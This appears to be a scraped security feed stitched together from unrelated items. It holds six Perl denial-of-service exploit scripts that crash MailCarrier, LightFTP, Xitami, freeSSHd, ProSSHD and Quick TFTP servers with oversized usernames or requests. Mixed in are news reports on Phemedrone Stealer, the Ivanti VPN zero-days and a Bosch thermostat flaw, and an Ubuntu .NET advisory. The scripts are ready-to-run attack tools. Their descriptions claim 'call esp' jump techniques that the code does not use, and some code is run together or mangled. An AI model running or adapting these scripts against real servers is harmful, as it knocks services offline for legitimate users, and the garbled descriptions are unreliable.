MailCarrier version 2.51 remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET# Exploit Title: MailCarrier 2.51 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 16 january 2024# Tested Version: MailCarrier 2.51# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.#When authenticating to the POP3 server with a long USERNAME or a USERNAME with a large number of characters for the POP3 server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";    my $buf  = "\x41" x 6000;    my $s = IO::Socket::INET->new(        PeerAddr => $ip,        PeerPort => $port,        Proto    => 'tcp'    ) or die "Unable to connect: $!\n";    $s->recv(my $data, 1024);    # Grab banners (if any)    $s->send('USER ' . $buf . "\r\n");    $s->recv(my $response, 1024);    $s->send("QUIT\r\n");    $s->close();    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] MailCarrier 2.51 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

MailCarrier 2.51 Denial Of Service

LightFTP version 1.1 remote denial of service exploit.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: LightFTP 1.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 15 january 2024  
# Vendor Homepage:  N/A  
# Notification vendor: No reported  
# Tested Version: LightFTP 1.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.  
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the FTP server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x500;    

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

    $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!";              

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                              ,--,  
                       _ ___/ /\|  
                   ,;'( )__, )  ~  
                  //  //   '--;   
                  '   \     | ^  
                       ^    ^

      [+] LightFTP 1.1 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

LightFTP 1.1 Denial Of Service

Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called Phemedrone Stealer.
“Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord,” Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.
“It also

Cryptocurrency / Windows Security

Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called **Phemedrone Stealer**.

"Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord," Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.

"It also takes screenshots and gathers system information regarding hardware, location, and operating system details. The stolen data is then sent to the attackers via Telegram or their command-and-control (C&C) server."

The attacks leverage CVE-2023-36025 (CVSS score: 8.8), a security bypass vulnerability in Windows SmartScreen, that could be exploited by tricking a user into clicking on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file.

The actively-exploited shortcoming was addressed by Microsoft as part of its November 2023 Patch Tuesday updates.

The infection process involves the threat actor hosting malicious Internet Shortcut files on Discord or cloud services like FileTransfer.io, with the links also masked using URL shorteners such as Short URL.

The execution of the booby-trapped .URL file allows it to connect to an actor-controlled server and execute a control panel (.CPL) file in a manner that circumvents Windows Defender SmartScreen by taking advantage of CVE-2023-36025.

"When the malicious .CPL file is executed through the Windows Control Panel process binary, it in turn calls rundll32.exe to execute the DLL," the researchers said. "This malicious DLL acts as a loader that then calls on Windows PowerShell to download and execute the next stage of the attack, hosted on GitHub."

The follow-on payload is a PowerShell loader ("DATA3.txt") that acts as a launchpad for Donut, an open-source shellcode loader that decrypts and executes Phemedrone Stealer.

Written in C#, Phemedrone Stealer is actively maintained by its developers on GitHub and Telegram, facilitating the theft of sensitive information from compromised systems.

The development is once again a sign that threat actors are getting increasingly flexible and quickly adapting their attack chains to capitalize on newly disclosed exploits and inflict maximum damage.

"Despite having been patched, threat actors continue to find ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a plethora of malware types, including ransomware and stealers like Phemedrone Stealer," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Weaponize Windows Flaw to Deploy Crypto-Siphoning Phemedrone Stealer

Xitami version 2.5 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 14 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1Uw9fCQ9T3IBqn53pS2lETUCM6zzYDSb8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=tutFcL3Gh8I

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5 Denial Of Service

freeSSHd version 1.0.9 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: freeSSHd 1.0.9 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 13 january 2024  
# Vendor Homepage:  N/A  
# Download to demo:   
# Notification vendor: No reported  
# Tested Version: freeSSHd 1.0.9 - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: 

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The SSH does not correctly handle the amount of data or bytes sent.  
#When authenticating to the SSH with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

my $bufff =  
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"x18;

    my $payload =  
      "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" .  
      "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" .  
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".("A" x 1067);

    $payload .= $payload;  
    $payload .= "C" x 19021 . "\r\n";

my $i=0;  
while ($i<=18) {  
    my $sock = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp'  
    ) or die "Cannot connect!\n";

    if (<$sock> eq '') {  
    print "[+] Done - Exploited success!!!!!\n\n";  
    exit;  
    }

    $sock->send($payload) or die "Exploited successuful!!!";

$i++;  
}

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] freeSSHd 1.0.9 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

freeSSHd 1.0.9 Denial Of Service

ProSSHD version 1.2 20090726 remote denial of service exploit.

    #!/usr/bin/perluse Net::SSH2# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 13 january 2024# Vendor Homepage: https://prosshd.com/# Notification vendor: No reported# Tested Version: ProSSHD 1.2 20090726# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data to SSH.#The following request sends a large amount of data to the SSH to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {s      $cmd="clear";    }    system("$cmd");        intro();    main();print "\t    ==> Connecting to webserver... \n\n";sleep(1);my $i=0;    print "\t    ==> Exploiting... \n\n";my $payload  = "\x41" x 500;$connection2 = Net::SSH2->new();$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";$scpget = $connection2->scp_get($payload);$connection2->disconnect();print "\t    ==> Done! Exploited!";   sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] ProSSHD 1.2 20090726 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port, $username, $password) = @ARGV;      unless (defined($ip) && defined($port)) {        print "\n\tUsage: $0 <ip> <port> <username> <password>           \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

ProSSHD 1.2 20090726 Denial Of Service

Quick TFTP Server Pro version 2.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 12 january 2024  
# Vendor Homepage: https://www.tallsoft.com/  
# Download to demo: https://drive.google.com/file/d/1Q4tIYjtv9Aqe5VE1fwnT18d3Cc-xkYEX/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Quick TFTP Server Pro 2.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=yz7_ImFYueA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to TFTP.  
#The following request sends a large amount of data to the TFTP to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $filename = "exploit";

$shell = "A"x317;

my $mode = "A" x 1360;

my $muha = "\x00\x02" .$filename . "\x00" .$mode;

socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or die "socket() failed: $!";  
send(SOCKET, $muha, 0, sockaddr_in($port, inet_aton($ip))) or die "send() failed: $!";  

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Quick TFTP Server Pro 2.1 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Quick TFTP Server Pro 2.1 Denial Of Service

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.
"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an

Vulnerability / Threat Intelligence

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.

"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an analysis published this week. The Google-owned threat intelligence firm is tracking the threat actor under the moniker **UNC5221**.

The attacks leverage an exploit chain comprising an authentication bypass flaw (CVE-2023-46805) and a code injection vulnerability (CVE-2024-21887) to take over susceptible instances.

Volexity, which attributed the activity to a suspected Chinese espionage actor named UTA0178, said the twin flaws were used to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment.

According to Ivanti, the intrusions impacted less than 10 customers, indicating that this could be a highly-targeted campaign. Patches for the two vulnerabilities (informally called ConnectAround) are expected to become available in the week of January 22.

Mandiant's analysis of the attacks has revealed the presence of five different custom malware families, besides injecting malicious code into legitimate files within ICS and using other legitimate tools like BusyBox and PySoxy to facilitate subsequent activity.

"Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling," the company said.

LIGHTWIRE is one of the two web shells, the other being WIREFIRE, which are "lightweight footholds" designed to ensure persistent remote access to compromised devices. While LIGHTWIRE is written in Perl CGI, WIREFIRE is implemented in Python.

Also used in the attacks are a JavaScript-based credential stealer dubbed WARPWIRE and a passive backdoor named ZIPLINE that's capable of downloading/uploading files, establishing a reverse shell, creating a proxy server, and setting up a tunneling server to dispatch traffic between multiple endpoints.

"This indicates that these are not opportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it compromised after a patch was inevitably released," Mandiant further added.

UNC5221 has not been linked to any previously known group or a particular country, although the targeting of edge infrastructure by weaponizing zero-day flaws and the use of compromise command-and-control (C2) infrastructure to bypass detection bears all the hallmarks of an advanced persistent threat (APT).

"UNC5221's activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors," Mandiant said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families

By Waqas
Firmware Vulnerability Found in Bosch Thermostat Model BCC100: Patch Now or Freeze.
This is a post from HackRead.com Read the original post: Hackers can hijack your Bosch Thermostat and Install Malware

Bitdefender Labs has discovered that the popular Bosch thermostat model BCC100 is vulnerable to cybersecurity threats. This vulnerability could allow a remote attacker to manipulate settings and install malware on the device.

Researchers have discovered vulnerabilities in the Bosch BCC100 thermostat, which could compromise users’ privacy and comfort. The vulnerabilities, discovered by Bitdefender Labs, allow attackers to access thermostat settings and data, manipulate settings remotely, and install malware.

The latest revelations regarding the vulnerable state of IoT devices should not be surprising. From electronic skateboards to coffee machines, from treadmills to security cameras in your room, everything connected to the internet is susceptible to potential threats.

As for the latest development, Bitdefender Labs, creator of the first smart home cybersecurity hub, regularly audits popular IoT hardware for vulnerabilities. Its latest research has revealed vulnerabilities in the Bosch BCC100 thermostat, affecting versions 1.7.0 – HD Version 4.13.22.

Bitdefender researchers discovered the vulnerability on August 29, 2023, but the details of it were only published on January 11, 2024. The vulnerability allows attackers to replace device firmware with a rogue version (CVE-2023-49722). The vulnerability was confirmed and triaged in October 2023, and Bosch started working on a fix immediately. Bitdefender responsibly disclosed the flaw on January 11, 2024.

To understand the flaw, it is essential to know how the BCC100 thermostat works. The thermostat uses two microcontrollers: a Hi-Flying chip (HF-LPT230) for Wi-Fi functionality and an STMicroelectronics chip (STM32F103) for implementing the main logic.

The STM chip lacks networking capabilities and relies on the Wi-Fi chip for communication. The Wi-Fi chip listens on TCP port 8899 on the LAN and, via the UART data bus, it mirrors any message received directly to the main microcontroller.

However, if properly formatted, the microcontroller cannot differentiate between malicious and genuine messages sent by the cloud server. An attacker can exploit this to send commands to the thermostat, including malicious updates.

The thermostat communicates with the connect.boschconnectedcontrol.com server via JSON-encoded payloads over a WebSocket, which are unmasked, and easy to imitate. The device initiates the “device/update” command on port 8899, triggering the thermostat to request details from the cloud server.

Despite an error code, the device accepts a forged response with the firmware update details, including the URL, size, MD5 checksum, and version. The device then requests the cloud server to download the firmware and send it through the WebSocket, ensuring the URL is accessible. Once the device receives the file, it performs the upgrade, finalizing the compromise.

According to Bitdefender Labs’ blog post, users are advised to follow necessary security practices. This includes updating the thermostat firmware, changing the default administrative password, avoiding connecting the thermostat to the internet unnecessarily, and using a firewall to restrict access from unauthorized devices.

Bitdefender Labs has stressed the significance of selecting secure smart home devices and ensuring their timely updates with the latest security patches. For specific details, refer to Bosch’s security advisory published on January 9, 2023.

Nevertheless, this research highlights that even seemingly innocuous smart devices can pose security risks. As the smart home market continues to grow, manufacturers must prioritize security and ensure a safe and reliable connected environment.

1.  **The Pros and Cons of Smart Homes**
2.  **Are Smart Home Devices Invading Your Privacy?**
3.  **White hat hacker infects smart coffee machine with ransowmare**
4.  **AXIS A1001 Network Door Controller Flaw Exposes Secure Facilities**
5.  **Controller-level flaws can let hackers physically damage moving bridges**
6.  **Power Grids to Airports: TETRA Radio Hacking Risks Global Infrastructure**

Hackers can hijack your Bosch Thermostat and Install Malware

Ubuntu Security Notice 6578-1 - Vishal Mishra and Anita Gaud discovered that .NET did not properly validate X.509 certificates with malformed signatures. An attacker could possibly use this issue to bypass an application's typical authentication logic. Morgan Brown discovered that .NET did not properly handle requests from unauthenticated clients. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6578-1  
January 11, 2024

dotnet6, dotnet7, dotnet8 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in dotnet6, dotnet7, and dotnet8.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime  
- dotnet8: dotNET CLI tools and runtime

Details:

Vishal Mishra and Anita Gaud discovered that .NET did not properly  
validate X.509 certificates with malformed signatures. An attacker  
could possibly use this issue to bypass an application's typical  
authentication logic. (CVE-2024-0057)

Morgan Brown discovered that .NET did not properly handle requests from  
unauthenticated clients. An attacker could possibly use this issue to  
cause a denial of service. (CVE-2024-21319)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   aspnetcore-runtime-6.0          6.0.126-0ubuntu1~23.10.1  
   aspnetcore-runtime-7.0          7.0.115-0ubuntu1~23.10.1  
   aspnetcore-runtime-8.0          8.0.1-0ubuntu1~23.10.1  
   dotnet-host                     6.0.126-0ubuntu1~23.10.1  
   dotnet-host-7.0                 7.0.115-0ubuntu1~23.10.1  
   dotnet-host-8.0                 8.0.1-0ubuntu1~23.10.1  
   dotnet-hostfxr-6.0              6.0.126-0ubuntu1~23.10.1  
   dotnet-hostfxr-7.0              7.0.115-0ubuntu1~23.10.1  
   dotnet-hostfxr-8.0              8.0.1-0ubuntu1~23.10.1  
   dotnet-runtime-6.0              6.0.126-0ubuntu1~23.10.1  
   dotnet-runtime-7.0              7.0.115-0ubuntu1~23.10.1  
   dotnet-runtime-8.0              8.0.1-0ubuntu1~23.10.1  
   dotnet-sdk-6.0                  6.0.126-0ubuntu1~23.10.1  
   dotnet-sdk-7.0                  7.0.115-0ubuntu1~23.10.1  
   dotnet-sdk-8.0                  8.0.101-0ubuntu1~23.10.1  
   dotnet6                         6.0.126-0ubuntu1~23.10.1  
   dotnet7                         7.0.115-0ubuntu1~23.10.1  
   dotnet8                         8.0.101-8.0.1-0ubuntu1~23.10.1

Ubuntu 23.04:  
   aspnetcore-runtime-6.0          6.0.126-0ubuntu1~23.04.1  
   aspnetcore-runtime-7.0          7.0.115-0ubuntu1~23.04.1  
   dotnet-host                     6.0.126-0ubuntu1~23.04.1  
   dotnet-host-7.0                 7.0.115-0ubuntu1~23.04.1  
   dotnet-hostfxr-6.0              6.0.126-0ubuntu1~23.04.1  
   dotnet-hostfxr-7.0              7.0.115-0ubuntu1~23.04.1  
   dotnet-runtime-6.0              6.0.126-0ubuntu1~23.04.1  
   dotnet-runtime-7.0              7.0.115-0ubuntu1~23.04.1  
   dotnet-sdk-6.0                  6.0.126-0ubuntu1~23.04.1  
   dotnet-sdk-7.0                  7.0.115-0ubuntu1~23.04.1  
   dotnet6                         6.0.126-0ubuntu1~23.04.1  
   dotnet7                         7.0.115-0ubuntu1~23.04.1

Ubuntu 22.04 LTS:  
   aspnetcore-runtime-6.0          6.0.126-0ubuntu1~22.04.1  
   aspnetcore-runtime-7.0          7.0.115-0ubuntu1~22.04.1  
   dotnet-host                     6.0.126-0ubuntu1~22.04.1  
   dotnet-host-7.0                 7.0.115-0ubuntu1~22.04.1  
   dotnet-hostfxr-6.0              6.0.126-0ubuntu1~22.04.1  
   dotnet-hostfxr-7.0              7.0.115-0ubuntu1~22.04.1  
   dotnet-runtime-6.0              6.0.126-0ubuntu1~22.04.1  
   dotnet-runtime-7.0              7.0.115-0ubuntu1~22.04.1  
   dotnet-sdk-6.0                  6.0.126-0ubuntu1~22.04.1  
   dotnet-sdk-7.0                  7.0.115-0ubuntu1~22.04.1  
   dotnet6                         6.0.126-0ubuntu1~22.04.1  
   dotnet7                         7.0.115-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6578-1  
   CVE-2024-0057, CVE-2024-21319

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.126-0ubuntu1~23.10.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.115-0ubuntu1~23.10.1  
https://launchpad.net/ubuntu/+source/dotnet8/8.0.101-8.0.1-0ubuntu1~23.10.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.126-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.115-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.126-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.115-0ubuntu1~22.04.1

Tag

#perl